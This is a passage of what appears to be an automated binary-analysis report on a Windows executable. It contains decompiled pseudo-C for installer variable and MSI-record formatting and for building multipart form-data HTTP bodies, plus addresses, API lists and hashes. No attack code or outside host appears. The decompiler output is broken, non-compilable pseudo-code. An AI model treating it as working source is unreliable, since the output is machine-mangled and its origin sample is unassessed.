                                                                                                                                                                  									__eflags = _v20 - 2;
                                                                                                                                                                  									if(_v20 < 2) {
                                                                                                                                                                  										L20:
                                                                                                                                                                  										__eflags = _a20 - _t207;
                                                                                                                                                                  										if(_a20 == _t207) {
                                                                                                                                                                  											L22:
                                                                                                                                                                  											_t153 = _v16 + _t185 * 4;
                                                                                                                                                                  											__eflags = _v36 - _t207;
                                                                                                                                                                  											if(_v36 == _t207) {
                                                                                                                                                                  												_v40 = _t153;
                                                                                                                                                                  												_t208 = E00403AC6(_t201, _t205, _a4, _v12, _t153);
                                                                                                                                                                  												_a8 = _t208;
                                                                                                                                                                  												__eflags = _t208 - 0x80070490;
                                                                                                                                                                  												if(_t208 == 0x80070490) {
                                                                                                                                                                  													_t160 = E00433F88(_v40, 0x43b580, _t207);
                                                                                                                                                                  													_t208 = _t160;
                                                                                                                                                                  													_a8 = _t160;
                                                                                                                                                                  												}
                                                                                                                                                                  												L27:
                                                                                                                                                                  												__eflags = _t208;
                                                                                                                                                                  												if(_t208 < 0) {
                                                                                                                                                                  													_push("Failed to set variable value.");
                                                                                                                                                                  													goto L7;
                                                                                                                                                                  												}
                                                                                                                                                                  												_v8 = _t185 + 1;
                                                                                                                                                                  												_t208 = E00433CEA( &_v12, L"[%d]", _t185 + 1);
                                                                                                                                                                  												_t223 = _t223 + 0xc;
                                                                                                                                                                  												_a8 = _t208;
                                                                                                                                                                  												__eflags = _t208;
                                                                                                                                                                  												if(_t208 < 0) {
                                                                                                                                                                  													_push("Failed to format placeholder string.");
                                                                                                                                                                  													goto L7;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t208 = E00433C35(_t201,  &_v24, _v12, _t207);
                                                                                                                                                                  												_a8 = _t208;
                                                                                                                                                                  												__eflags = _t208;
                                                                                                                                                                  												if(_t208 < 0) {
                                                                                                                                                                  													_push("Failed to append placeholder.");
                                                                                                                                                                  													goto L7;
                                                                                                                                                                  												}
                                                                                                                                                                  												L30:
                                                                                                                                                                  												_t180 = _v44 + 2;
                                                                                                                                                                  												__eflags = _t180;
                                                                                                                                                                  												_push(0x5b);
                                                                                                                                                                  												_push(_t180);
                                                                                                                                                                  												_t159 = E00426E94(_t158, _t180, _t201, _t205, _t207, _t208, _t180);
                                                                                                                                                                  												_t209 = _t159;
                                                                                                                                                                  												_v40 = _t159;
                                                                                                                                                                  												continue;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push(_t207);
                                                                                                                                                                  											_push(L"*****");
                                                                                                                                                                  											L24:
                                                                                                                                                                  											_push(_t153);
                                                                                                                                                                  											_t208 = E00433F88();
                                                                                                                                                                  											_a8 = _t208;
                                                                                                                                                                  											goto L27;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t208 = E00403619(_t201, _a4, _v12,  &_v36);
                                                                                                                                                                  										_a8 = _t208;
                                                                                                                                                                  										__eflags = _t208;
                                                                                                                                                                  										if(_t208 < 0) {
                                                                                                                                                                  											E00430A57(_t208, "Failed to determine variable visibility: \'%ls\'.", _v12);
                                                                                                                                                                  											goto L64;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L22;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t205 = 0x5c;
                                                                                                                                                                  									__eflags = _t205 -  *_v32;
                                                                                                                                                                  									if(_t205 !=  *_v32) {
                                                                                                                                                                  										goto L20;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push(1);
                                                                                                                                                                  									_push(_v40 + 4);
                                                                                                                                                                  									_t153 = _t201 + _t185 * 4;
                                                                                                                                                                  									goto L24;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push(_t202);
                                                                                                                                                                  								_t168 = E0043120C();
                                                                                                                                                                  								__eflags = _t168;
                                                                                                                                                                  								if(_t168 == 0) {
                                                                                                                                                                  									_t184 = 0x8007000e;
                                                                                                                                                                  									_t208 = 0x8007000e;
                                                                                                                                                                  									_a8 = 0x8007000e;
                                                                                                                                                                  									E004300D9(_t168, "variable.cpp", 0x3e4, 0x8007000e);
                                                                                                                                                                  									_push("Failed to reallocate variable array.");
                                                                                                                                                                  									goto L36;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t201 = _t168;
                                                                                                                                                                  								_v16 = _t201;
                                                                                                                                                                  								goto L17;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t208 = E00433C35(_t201,  &_v24, _t180, _t209 - _t180 >> 1);
                                                                                                                                                                  							_a8 = _t208;
                                                                                                                                                                  							__eflags = _t208;
                                                                                                                                                                  							if(_t208 < 0) {
                                                                                                                                                                  								L6:
                                                                                                                                                                  								_push("Failed to append string.");
                                                                                                                                                                  								goto L7;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t201 = _v20;
                                                                                                                                                                  							goto L12;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t208 = E00433C35(_t201,  &_v24, _t180, (_t116 - _t180 >> 1) + 1);
                                                                                                                                                                  						_a8 = _t208;
                                                                                                                                                                  						__eflags = _t208;
                                                                                                                                                                  						if(_t208 >= 0) {
                                                                                                                                                                  							goto L30;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L6;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t118 = E00433C35(_t190,  &_v24, _t180, _t207);
                                                                                                                                                                  					_t208 = _t118;
                                                                                                                                                                  					_a8 = _t208;
                                                                                                                                                                  					__eflags = _t208;
                                                                                                                                                                  					if(_t208 < 0) {
                                                                                                                                                                  						goto L6;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t181 = _v8;
                                                                                                                                                                  					_push(_t181);
                                                                                                                                                                  					L0042FF6A();
                                                                                                                                                                  					_v28 = _t118;
                                                                                                                                                                  					__eflags = _t118;
                                                                                                                                                                  					if(_t118 != 0) {
                                                                                                                                                                  						_push(_v24);
                                                                                                                                                                  						_push(_t207);
                                                                                                                                                                  						_push(_t118);
                                                                                                                                                                  						L0042FF70();
                                                                                                                                                                  						__eflags = _t118;
                                                                                                                                                                  						if(_t118 == 0) {
                                                                                                                                                                  							_t127 = _v8;
                                                                                                                                                                  							_t182 = _t207;
                                                                                                                                                                  							__eflags = _t127;
                                                                                                                                                                  							if(_t127 == 0) {
                                                                                                                                                                  								L51:
                                                                                                                                                                  								_t183 = _v28;
                                                                                                                                                                  								_t128 =  &_v20;
                                                                                                                                                                  								_push(_t128);
                                                                                                                                                                  								_push(0x43b580);
                                                                                                                                                                  								_push(_t183);
                                                                                                                                                                  								_push(_t207);
                                                                                                                                                                  								_v20 = _t207;
                                                                                                                                                                  								L0042FF76();
                                                                                                                                                                  								__eflags = _t128 - 0xea;
                                                                                                                                                                  								if(_t128 == 0xea) {
                                                                                                                                                                  									L55:
                                                                                                                                                                  									__eflags = _a12 - _t207;
                                                                                                                                                                  									if(_a12 == _t207) {
                                                                                                                                                                  										L62:
                                                                                                                                                                  										_t194 = _a16;
                                                                                                                                                                  										__eflags = _t194;
                                                                                                                                                                  										if(_t194 != 0) {
                                                                                                                                                                  											 *_t194 = _v20;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L64;
                                                                                                                                                                  									}
                                                                                                                                                                  									_v20 = _v20 + 1;
                                                                                                                                                                  									_t208 = E00433BDF( &_v12, _v20 + 1);
                                                                                                                                                                  									_a8 = _t208;
                                                                                                                                                                  									__eflags = _t208;
                                                                                                                                                                  									if(_t208 >= 0) {
                                                                                                                                                                  										_t134 =  &_v20;
                                                                                                                                                                  										_push(_t134);
                                                                                                                                                                  										_push(_v12);
                                                                                                                                                                  										_push(_t183);
                                                                                                                                                                  										_push(_t207);
                                                                                                                                                                  										L0042FF76();
                                                                                                                                                                  										__eflags = _t134;
                                                                                                                                                                  										if(_t134 == 0) {
                                                                                                                                                                  											_t208 = E00433F88(_a12, _v12, _t207);
                                                                                                                                                                  											_a8 = _t208;
                                                                                                                                                                  											__eflags = _t208;
                                                                                                                                                                  											if(_t208 >= 0) {
                                                                                                                                                                  												goto L62;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to copy string.");
                                                                                                                                                                  											goto L7;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = _t134;
                                                                                                                                                                  										_t213 =  <=  ? _t134 : _t134 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										__eflags = _t213;
                                                                                                                                                                  										_t208 =  >=  ? 0x80004005 : _t213;
                                                                                                                                                                  										_a8 = _t208;
                                                                                                                                                                  										E004300D9(0x80004005, "variable.cpp", 0x43c, _t208);
                                                                                                                                                                  										_push("Failed to format record.");
                                                                                                                                                                  										goto L7;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push("Failed to allocate string.");
                                                                                                                                                                  									goto L7;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t128;
                                                                                                                                                                  								if(_t128 == 0) {
                                                                                                                                                                  									goto L55;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t128;
                                                                                                                                                                  								_t216 =  <=  ? _t128 : _t128 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								__eflags = _t216;
                                                                                                                                                                  								_t208 =  >=  ? 0x80004005 : _t216;
                                                                                                                                                                  								_a8 = _t208;
                                                                                                                                                                  								E004300D9(0x80004005, "variable.cpp", 0x432, _t208);
                                                                                                                                                                  								_push("Failed to get formatted length.");
                                                                                                                                                                  								goto L7;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t195 = _v16;
                                                                                                                                                                  							do {
                                                                                                                                                                  								_t206 =  *((intOrPtr*)(_t195 + _t182 * 4));
                                                                                                                                                                  								__eflags =  *_t206 - _t207;
                                                                                                                                                                  								if( *_t206 == _t207) {
                                                                                                                                                                  									goto L50;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push(_t206);
                                                                                                                                                                  								_t74 = _t182 + 1; // 0x1
                                                                                                                                                                  								_t140 = _t74;
                                                                                                                                                                  								_push(_t140);
                                                                                                                                                                  								_push(_v28);
                                                                                                                                                                  								L0042FF70();
                                                                                                                                                                  								__eflags = _t140;
                                                                                                                                                                  								if(_t140 != 0) {
                                                                                                                                                                  									__eflags = _t140;
                                                                                                                                                                  									_t219 =  <=  ? _t140 : _t140 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									__eflags = _t219;
                                                                                                                                                                  									_t208 =  >=  ? 0x80004005 : _t219;
                                                                                                                                                                  									_a8 = _t208;
                                                                                                                                                                  									E004300D9(0x80004005, "variable.cpp", 0x426, _t208);
                                                                                                                                                                  									_push("Failed to set record string.");
                                                                                                                                                                  									goto L7;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t127 = _v8;
                                                                                                                                                                  								_t195 = _v16;
                                                                                                                                                                  								L50:
                                                                                                                                                                  								_t182 = _t182 + 1;
                                                                                                                                                                  								__eflags = _t182 - _t127;
                                                                                                                                                                  							} while (_t182 < _t127);
                                                                                                                                                                  							goto L51;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = _t118;
                                                                                                                                                                  						_t222 =  <=  ? _t118 : _t118 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						__eflags = _t222;
                                                                                                                                                                  						_t208 =  >=  ? 0x80004005 : _t222;
                                                                                                                                                                  						_a8 = _t208;
                                                                                                                                                                  						E004300D9(0x80004005, "variable.cpp", 0x41e, _t208);
                                                                                                                                                                  						_push("Failed to set record format string.");
                                                                                                                                                                  						_push(_t208);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  						goto L65;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t184 = 0x8007000e;
                                                                                                                                                                  					_t208 = 0x8007000e;
                                                                                                                                                                  					_a8 = 0x8007000e;
                                                                                                                                                                  					E004300D9(_t118, "variable.cpp", 0x41a, 0x8007000e);
                                                                                                                                                                  					_push("Failed to allocate record.");
                                                                                                                                                                  					goto L36;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to allocate buffer for format string.");
                                                                                                                                                                  					_push(_t208);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					_t181 = 0;
                                                                                                                                                                  					L65:
                                                                                                                                                                  					LeaveCriticalSection(_a4);
                                                                                                                                                                  					_t120 = _v16;
                                                                                                                                                                  					if(_t120 == 0) {
                                                                                                                                                                  						L73:
                                                                                                                                                                  						_t121 = _v28;
                                                                                                                                                                  						if(_t121 != 0) {
                                                                                                                                                                  							_push(_t121);
                                                                                                                                                                  							L0042FF64();
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_v24 != 0) {
                                                                                                                                                                  							E004380AB(_v24);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_v12 != 0) {
                                                                                                                                                                  							E004380AB(_v12);
                                                                                                                                                                  						}
                                                                                                                                                                  						return _t208;
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t181 == 0) {
                                                                                                                                                                  						L72:
                                                                                                                                                                  						E00431137(_t120);
                                                                                                                                                                  						goto L73;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t210 = _t120;
                                                                                                                                                                  					do {
                                                                                                                                                                  						if( *((intOrPtr*)(_t210 + _t207 * 4)) != 0) {
                                                                                                                                                                  							E004380AB( *((intOrPtr*)(_t210 + _t207 * 4)));
                                                                                                                                                                  						}
                                                                                                                                                                  						_t207 = _t207 + 1;
                                                                                                                                                                  					} while (_t207 < _t181);
                                                                                                                                                                  					_t208 = _a8;
                                                                                                                                                                  					_t120 = _v16;
                                                                                                                                                                  					goto L72;
                                                                                                                                                                  				}
                                                                                                                                                                  			}
                                                                                                                                                                  0x0040239a
                                                                                                                                                                  0x0040239c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004023a2
                                                                                                                                                                  0x004023a5
                                                                                                                                                                  0x004023a6
                                                                                                                                                                  0x004023ab
                                                                                                                                                                  0x004023ae
                                                                                                                                                                  0x004023b0
                                                                                                                                                                  0x0040245b
                                                                                                                                                                  0x0040245e
                                                                                                                                                                  0x0040245f
                                                                                                                                                                  0x00402460
                                                                                                                                                                  0x00402465
                                                                                                                                                                  0x00402467
                                                                                                                                                                  0x004024a6
                                                                                                                                                                  0x004024a9
                                                                                                                                                                  0x004024ab
                                                                                                                                                                  0x004024ad
                                                                                                                                                                  0x004024d6
                                                                                                                                                                  0x004024d6
                                                                                                                                                                  0x004024d9
                                                                                                                                                                  0x004024dc
                                                                                                                                                                  0x004024dd
                                                                                                                                                                  0x004024e2
                                                                                                                                                                  0x004024e3
                                                                                                                                                                  0x004024e4
                                                                                                                                                                  0x004024e7
                                                                                                                                                                  0x004024ec
                                                                                                                                                                  0x004024f1
                                                                                                                                                                  0x00402561
                                                                                                                                                                  0x00402561
                                                                                                                                                                  0x00402564
                                                                                                                                                                  0x004025f4
                                                                                                                                                                  0x004025f4
                                                                                                                                                                  0x004025f7
                                                                                                                                                                  0x004025f9
                                                                                                                                                                  0x004025fe
                                                                                                                                                                  0x004025fe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004025f9
                                                                                                                                                                  0x0040256f
                                                                                                                                                                  0x0040257b
                                                                                                                                                                  0x0040257d
                                                                                                                                                                  0x00402580
                                                                                                                                                                  0x00402582
                                                                                                                                                                  0x0040258e
                                                                                                                                                                  0x00402591
                                                                                                                                                                  0x00402592
                                                                                                                                                                  0x00402595
                                                                                                                                                                  0x00402596
                                                                                                                                                                  0x00402597
                                                                                                                                                                  0x0040259c
                                                                                                                                                                  0x0040259e
                                                                                                                                                                  0x004025e1
                                                                                                                                                                  0x004025e3
                                                                                                                                                                  0x004025e6
                                                                                                                                                                  0x004025e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004025ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004025ea
                                                                                                                                                                  0x004025a9
                                                                                                                                                                  0x004025ab
                                                                                                                                                                  0x004025b3
                                                                                                                                                                  0x004025b5
                                                                                                                                                                  0x004025c3
                                                                                                                                                                  0x004025c6
                                                                                                                                                                  0x004025cb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004025cb
                                                                                                                                                                  0x00402584
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402584
                                                                                                                                                                  0x004024f3
                                                                                                                                                                  0x004024f5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402500
                                                                                                                                                                  0x00402502
                                                                                                                                                                  0x0040250a
                                                                                                                                                                  0x0040250c
                                                                                                                                                                  0x0040251a
                                                                                                                                                                  0x0040251d
                                                                                                                                                                  0x00402522
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402522
                                                                                                                                                                  0x004024af
                                                                                                                                                                  0x004024b2
                                                                                                                                                                  0x004024b2
                                                                                                                                                                  0x004024b5
                                                                                                                                                                  0x004024b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004024ba
                                                                                                                                                                  0x004024bb
                                                                                                                                                                  0x004024bb
                                                                                                                                                                  0x004024be
                                                                                                                                                                  0x004024bf
                                                                                                                                                                  0x004024c2
                                                                                                                                                                  0x004024c7
                                                                                                                                                                  0x004024c9
                                                                                                                                                                  0x00402535
                                                                                                                                                                  0x00402537
                                                                                                                                                                  0x0040253f
                                                                                                                                                                  0x00402541
                                                                                                                                                                  0x0040254f
                                                                                                                                                                  0x00402552
                                                                                                                                                                  0x00402557
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402557
                                                                                                                                                                  0x004024cb
                                                                                                                                                                  0x004024ce
                                                                                                                                                                  0x004024d1
                                                                                                                                                                  0x004024d1
                                                                                                                                                                  0x004024d2
                                                                                                                                                                  0x004024d2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004024b2
                                                                                                                                                                  0x00402472
                                                                                                                                                                  0x00402474
                                                                                                                                                                  0x0040247c
                                                                                                                                                                  0x0040247e
                                                                                                                                                                  0x0040248c
                                                                                                                                                                  0x0040248f
                                                                                                                                                                  0x00402494
                                                                                                                                                                  0x00402499
                                                                                                                                                                  0x0040249a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004024a0
                                                                                                                                                                  0x004023b6
                                                                                                                                                                  0x004023c1
                                                                                                                                                                  0x004023c8
                                                                                                                                                                  0x004023cb
                                                                                                                                                                  0x004023d0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004021a9
                                                                                                                                                                  0x004021a9
                                                                                                                                                                  0x004021ae
                                                                                                                                                                  0x004021af
                                                                                                                                                                  0x004021b6
                                                                                                                                                                  0x00402603
                                                                                                                                                                  0x00402606
                                                                                                                                                                  0x0040260c
                                                                                                                                                                  0x00402611
                                                                                                                                                                  0x00402638
                                                                                                                                                                  0x00402638
                                                                                                                                                                  0x0040263d
                                                                                                                                                                  0x0040263f
                                                                                                                                                                  0x00402640
                                                                                                                                                                  0x00402640
                                                                                                                                                                  0x00402649
                                                                                                                                                                  0x0040264e
                                                                                                                                                                  0x0040264e
                                                                                                                                                                  0x00402657
                                                                                                                                                                  0x0040265c
                                                                                                                                                                  0x0040265c
                                                                                                                                                                  0x00402667
                                                                                                                                                                  0x00402667

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000F8,00000000,000000F8,000000F8,000000F8,00000000,00000000,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00402185
                                                                                                                                                                  • lstrlenW.KERNEL32(000002A8,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 0040218F
                                                                                                                                                                  • #17.MSI(00000000,000000F8,000002A8,00000000,000000F8,00000001,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 004023A6
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000F8,000000F8,000002A8,00000000,000000F8,00000001,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00402606
                                                                                                                                                                  • #8.MSI(004068A8,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00402640
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeavelstrlen
                                                                                                                                                                  • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                                                                  • API String ID: 3224049430-2050445661
                                                                                                                                                                  • Opcode ID: db9ca18f5e1b12dec400090e8c8520715f26cd82cb2479434f294d2e336113c1
                                                                                                                                                                  • Instruction ID: e56affa54584c2a209784e5a82feb1a89c1aca6f61e23f9d521c428dc41282fa
                                                                                                                                                                  • Opcode Fuzzy Hash: db9ca18f5e1b12dec400090e8c8520715f26cd82cb2479434f294d2e336113c1
                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE1B671E40229ABDB119FA58E85AAF76B8AF08754F10517BFD00BB2C1D77C9D018B9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E100215A0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char* _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				char _v543;
                                                                                                                                                                  				char _v544;
                                                                                                                                                                  				char _v807;
                                                                                                                                                                  				char _v808;
                                                                                                                                                                  				char* _v812;
                                                                                                                                                                  				char _v1079;
                                                                                                                                                                  				char _v1080;
                                                                                                                                                                  				char* _v1084;
                                                                                                                                                                  				char* _v1088;
                                                                                                                                                                  				char _v1599;
                                                                                                                                                                  				char _v1600;
                                                                                                                                                                  				intOrPtr _v1604;
                                                                                                                                                                  				char _v15703;
                                                                                                                                                                  				char _v15704;
                                                                                                                                                                  				char* _v15708;
                                                                                                                                                                  				char _v29807;
                                                                                                                                                                  				char _v29808;
                                                                                                                                                                  				char* _v29812;
                                                                                                                                                                  				char _v43911;
                                                                                                                                                                  				char _v43912;
                                                                                                                                                                  				char _v58007;
                                                                                                                                                                  				char _v58008;
                                                                                                                                                                  				char _v58024;
                                                                                                                                                                  				char _v58052;
                                                                                                                                                                  				char _v58080;
                                                                                                                                                                  				char _v58084;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t172;
                                                                                                                                                                  				intOrPtr _t179;
                                                                                                                                                                  				void* _t186;
                                                                                                                                                                  				void* _t195;
                                                                                                                                                                  				void* _t216;
                                                                                                                                                                  				void* _t218;
                                                                                                                                                                  				void* _t237;
                                                                                                                                                                  				void* _t254;
                                                                                                                                                                  				intOrPtr _t297;
                                                                                                                                                                  				intOrPtr _t357;
                                                                                                                                                                  				void* _t359;
                                                                                                                                                                  				void* _t366;
                                                                                                                                                                  				void* _t376;
                                                                                                                                                                  				void* _t385;
                                                                                                                                                                  				void* _t392;
                                                                                                                                                                  
                                                                                                                                                                  				_t353 = __edi;
                                                                                                                                                                  				_t265 = __ebx;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E100231DA);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t357;
                                                                                                                                                                  				E10018B00(0xe2d4);
                                                                                                                                                                  				_push(_t354);
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v28 = "--";
                                                                                                                                                                  				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
                                                                                                                                                                  					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
                                                                                                                                                                  					_v1084 = "Content-Type: %s";
                                                                                                                                                                  					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
                                                                                                                                                                  					_v808 = 0;
                                                                                                                                                                  					E1000CF80(__edi,  &_v807, 0, 0x103);
                                                                                                                                                                  					_v1080 = 0;
                                                                                                                                                                  					E1000CF80(_t353,  &_v1079, 0, 0x103);
                                                                                                                                                                  					_v1600 = 0;
                                                                                                                                                                  					E1000CF80(_t353,  &_v1599, 0, 0x1ff);
                                                                                                                                                                  					_push(_a20);
                                                                                                                                                                  					_push(_a16);
                                                                                                                                                                  					E1000CCA3(_t353,  &_v808, _v812, _a16);
                                                                                                                                                                  					E1000CCA3(_t353,  &_v1080, _v1084, _a24);
                                                                                                                                                                  					_push( &_v1080);
                                                                                                                                                                  					_push( &_v808);
                                                                                                                                                                  					_push(_a4);
                                                                                                                                                                  					E1000CCA3(_t353,  &_v1600, _v1088, _v28);
                                                                                                                                                                  					_t392 = _t357 + 0x5c;
                                                                                                                                                                  					if( *_a36 != 0) {
                                                                                                                                                                  						E1000D1F0(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAD0( &_v1600));
                                                                                                                                                                  						_t392 = _t392 + 0x10;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t254 = E1000CAD0( &_v1600);
                                                                                                                                                                  					_t357 = _t392 + 4;
                                                                                                                                                                  					_v24 = _t254 + _v24;
                                                                                                                                                                  					if( *_a36 != 0) {
                                                                                                                                                                  						E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
                                                                                                                                                                  						_t357 = _t357 + 0xc;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v24 = _v24 + _a32;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_a8 != 0 && _a12 > 0) {
                                                                                                                                                                  					_t172 = E10001A50(_a8, "=");
                                                                                                                                                                  					_t357 = _t357 + 8;
                                                                                                                                                                  					if(_t172 != 0) {
                                                                                                                                                                  						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
                                                                                                                                                                  						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
                                                                                                                                                                  						_v58008 = 0;
                                                                                                                                                                  						E1000CF80(_t353,  &_v58007, 0, 0x370f);
                                                                                                                                                                  						_v29808 = 0;
                                                                                                                                                                  						E1000CF80(_t353,  &_v29807, 0, 0x370f);
                                                                                                                                                                  						_v43912 = 0;
                                                                                                                                                                  						E1000CF80(_t353,  &_v43911, 0, 0x370f);
                                                                                                                                                                  						_v15704 = 0;
                                                                                                                                                                  						E1000CF80(_t353,  &_v15703, 0, 0x370f);
                                                                                                                                                                  						_t179 = E10001A50(_a8, "&");
                                                                                                                                                                  						_t366 = _t357 + 0x38;
                                                                                                                                                                  						_v1604 = _t179;
                                                                                                                                                                  						if(_v1604 != 0) {
                                                                                                                                                                  							E10001160( &_v58052, __eflags, _a8);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							E10003060( &_v58024, __eflags);
                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                  							E10001160( &_v58080, __eflags, "&");
                                                                                                                                                                  							_v8 = 2;
                                                                                                                                                                  							E1001A8B0(__eflags,  &_v58052,  &_v58024,  &_v58080);
                                                                                                                                                                  							_t357 = _t366 + 0xc;
                                                                                                                                                                  							_v58084 = 0;
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								_t186 = E10002270( &_v58024);
                                                                                                                                                                  								__eflags = _v58084 - _t186;
					if(_v58084 >= _t186) {
						break;
					}
					E1000CF80(_t353,  &_v43912, 0, 0x3710);
					E1000CF80(_t353,  &_v15704, 0, 0x3710);
					_t195 = E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=");
					_t354 = _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084));
					E1000D1F0(_t265, _t353, _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E100030B0( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)));
					E1000D903(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=") + 1);
					E1000CF80(_t353,  &_v58008, 0, 0x3710);
					E1000CF80(_t353,  &_v29808, 0, 0x3710);
					E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
					_push( &_v15704);
					_push( &_v58008);
					_push(_a4);
					E1000CCA3(_t353,  &_v29808, _v29812, _v28);
					_t376 = _t357 + 0x7c;
					__eflags =  *_a36;
					if( *_a36 != 0) {
						_t218 = E1000CAD0( &_v29808);
						__eflags =  *_a36 + _v24;
						E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
						_t376 = _t376 + 0x10;
					}
					_t216 = E1000CAD0( &_v29808);
					_t357 = _t376 + 4;
					_v24 = _t216 + _v24;
					_t297 = _v58084 + 1;
					__eflags = _t297;
					_v58084 = _t297;
				}
				_v8 = 1;
				E100011A0( &_v58080);
				_v8 = 0;
				E10003090( &_v58024);
